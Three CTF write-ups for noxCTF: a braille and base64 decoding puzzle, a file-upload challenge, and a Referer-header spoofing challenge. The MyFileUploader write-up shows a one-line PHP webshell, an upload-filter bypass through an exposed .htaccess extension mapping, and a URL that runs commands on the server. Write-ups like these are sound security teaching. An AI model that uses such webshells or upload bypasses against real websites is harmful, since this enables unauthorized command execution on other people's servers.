noxCTF – World Wide Dictionary writeup

So, we decided to solve the World Wide Dictionary challenge.

The obvious thing to do is to convert those characters to 1 and 0.
It seems the right thing to do in this part of the challenge.

But unfortunately, I have been trying to do this and suddenly my “sublime text editor” crashed, I was pretty sure at this moment that the challenge writers exploited my sublime.

So an alternative way(and what I eventually did) is to save the data in a file and to try to replace the characters with the ones and zeros.

I wrote this python script to do this replacement.

def main():
    with open("replace.txt", "r+") as file:
        data = file.read().replace("O", "0").replace("I", "1")
        file.seek(0)
        file.write(data)

main()

And now we have this ASCII representation of the binary code or something like this.

When I looked at the length of the characters, I saw it was 104,790.
It’s not so hard to understand that this number cannot be divided by 8.
Strange, So It’s probably not an executable.

Then what is it?
I checked the divisors of 104,790 and discovered that 6 is a divisor of this number.
That is the time for Google of course.

I clicked the first result because Wikipedia is awesome and one of the options caught my eye:

So let’s dive even deeper:

And deeper:

What you can see here is a conversion table between six-bit binary and braille in ASCII format.
It’s great for me.

I copy-pasted the table and did some “sublime” magic tricks(using sublime’s great multi-cursor) and build the following python dictionary:

map = {
"000000" : " ",
"011011" : "!",
"000100" : "\"",
"010111" : "#",
"111001" : "$",
"110001" : "%",
"111011" : "&",
"000010" : "'",
"101111" : "(",
"011111" : ")",
"100001" : "*",
"010011" : "+",
"000001" : ",",
"000011" : "-",
"010001" : ".",
"010010" : "/",
"000111" : "0",
"001000" : "1",
"001010" : "2",
"001100" : "3",
"001101" : "4",
"001001" : "5",
"001110" : "6",
"001111" : "7",
"001011" : "8",
"000110" : "9",
"100101" : ":",
"000101" : ";",
"101001" : "<",
"111111" : "=",
"010110" : ">",
"110101" : "?",
"010000" : "@",
"100000" : "A",
"101000" : "B",
"110000" : "C",
"110100" : "D",
"100100" : "E",
"111000" : "F",
"111100" : "G",
"101100" : "H",
"011000" : "I",
"011100" : "J",
"100010" : "K",
"101010" : "L",
"110010" : "M",
"110110" : "N",
"100110" : "O",
"111010" : "P",
"111110" : "Q",
"101110" : "R",
"011010" : "S",
"011110" : "T",
"100011" : "U",
"101011" : "V",
"011101" : "W",
"110011" : "X",
"110111" : "Y",
"100111" : "Z",
"011001" : "[",
"101101" : "\\",
"111101" : "]",
"010100" : "^",
"010101" : "_"
}

At this moment I had to write a script that converts the binary to an ASCII representation using this dictionary.

The python script:

map = {
"000000" : " ",
"011011" : "!",
"000100" : "\"",
"010111" : "#",
"111001" : "$",
"110001" : "%",
"111011" : "&",
"000010" : "'",
"101111" : "(",
"011111" : ")",
"100001" : "*",
"010011" : "+",
"000001" : ",",
"000011" : "-",
"010001" : ".",
"010010" : "/",
"000111" : "0",
"001000" : "1",
"001010" : "2",
"001100" : "3",
"001101" : "4",
"001001" : "5",
"001110" : "6",
"001111" : "7",
"001011" : "8",
"000110" : "9",
"100101" : ":",
"000101" : ";",
"101001" : "<",
"111111" : "=",
"010110" : ">",
"110101" : "?",
"010000" : "@",
"100000" : "A",
"101000" : "B",
"110000" : "C",
"110100" : "D",
"100100" : "E",
"111000" : "F",
"111100" : "G",
"101100" : "H",
"011000" : "I",
"011100" : "J",
"100010" : "K",
"101010" : "L",
"110010" : "M",
"110110" : "N",
"100110" : "O",
"111010" : "P",
"111110" : "Q",
"101110" : "R",
"011010" : "S",
"011110" : "T",
"100011" : "U",
"101011" : "V",
"011101" : "W",
"110011" : "X",
"110111" : "Y",
"100111" : "Z",
"011001" : "[",
"101101" : "\\",
"111101" : "]",
"010100" : "^",
"010101" : "_"
}

def main():
    with open("replace.txt", "r") as file:
        data = file.read()


    chunks = [] 
    for i in range(0, len(data), 6):
        chunks.append(map[data[i: i + 6]].encode())

    with open("out.txt", "wb") as file:
        file.write(b''.join(chunks))


main()

The result in “out.txt” file looks like a binary data:

I took this data and put it in “010 Editor” as a hexadecimal representation using CTRL+shift+v.

I found out it’s base64 encoded data:

I decoded the base64 data and saw it is actually a PNG image.

Cool, I felt we are so close to the end of this challenge, In retrospect, we were indeed.

When I opened the image I saw something that looks like the sign language:

I searched for so many sign language images on google and didn’t found the specific image I had or at least the signs itself.

And in this desperate situation, I thought for myself, How the fuck did he generate those signs.

Then, I Googled “text to sign language”:

I used this website to convert all the characters to its signs, and:

Yeah, these are the exact signs the challenge writer used.
I converted the signs, the result is:
the flag is d1c710n4ry

So by the format, the flag was:

noxCTF{d1c710n4ry}

Couldn’t have done it without my team.

noxCTF – MyFileUploader writeup

We start the challenge with this URI:

http://chal.noxale.com:8079/

When I accessed this page I saw a file uploading page.
Tried to upload a webshell and saw I can’t upload a file that doesn’t have one of these extensions:

JPG, PNG, GIF

I tried to play with the extensions and put a “double extension” like this:
test.jpg.php

But it didn’t work.
The website cuts the PHP extension but not any other extensions – this allows me to upload a file with any extension except PHP.
When I uploaded a regular legit file it was saved in /uploads/ with the same name.

The uploads route has dir listing and inside the directory, there is another directory called “Don’t open” and inside this directory, there is HTACCESS file.

HTACCESS file is the configuration file for the web server.

.htaccess is a configuration file for use on web servers running the Apache Web Server software.

When a .htaccess file is placed in a directory which is in turn ‘loaded via the Apache Web Server’, then the .htaccess file is detected and executed by the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features that the Apache Web Server software has to offer.

normally you shouldn’t see this file but, in this case, it somehow(intentionally) accessible through the directory listing – great for us.

The file looks like this:

Options +Indexes
AddType application/x-httpd-php .cyb3r

What we could understand is that the cyb3r extension is treated as php file.
so we are trying to upload file named test.jpg.cyb3r with this content:

<?php
system($_GET["0"]);

This is an ugly webshell but I wanted just to succeed at this point
The file was uploaded successfully!

Now I can browse to

http://chal.noxale.com:8079/uploads/test.jpg.cyb3r?0=ls -la

My command was executed and the result returned successfully.

I got back a list of files and one dir: 7H3-FL4G-1S-H3r3

ls on this dir gives back one file name with the flag value:

noxCTF{N3V3R_7RU57_07H3R5}

This challenge was actually 5 min challenge 🙂

noxCTF – References writeup

We start the challenge with this URI:

http://chal.noxale.com:5000/

Opening this page, we get a simple site, only containing the plaintext “where the **** did you come from?”.

After reading through the site’s sources, we’ve found one script, which by itself is interesting, as no additional functionality is offered to the user:

<script src="js/index.js"></script>

The script reads:

$( document ).ready(function() {
    $.ajax({
        url: "check_from_google",
        data: NaN,
        success: function(result) {
            $("#status").html("hello old friend! " + atob(result))        
        },
        dataType: NaN
    }).fail(function() {
        $("#status").html("where the **** did you come from?")
    });
});

Simply put, the script sends a request to a page called “check_from_google” and changes the text according to the response’s status code.
Along with the rest of the hints, we can assume that check_from_google probably checks the referer header for the string “google”.

The next step is pretty clear- change the referer header to be google.com or any other domain containing the substring “google”.

We got back an HTTP 200 OK with the following payload:

    bm94Q1RGe0cwb2dMM18xc180bFc0WXNfVXJfYjNTVF9SM2YzcjNuYzN9

Decoding it as base64 data, we get the flag:

    noxCTF{G0ogL3_1s_4lW4Ys_Ur_b3ST_R3f3r3nc3}

In my opinion, this was one of the simpler challenges in this CTF.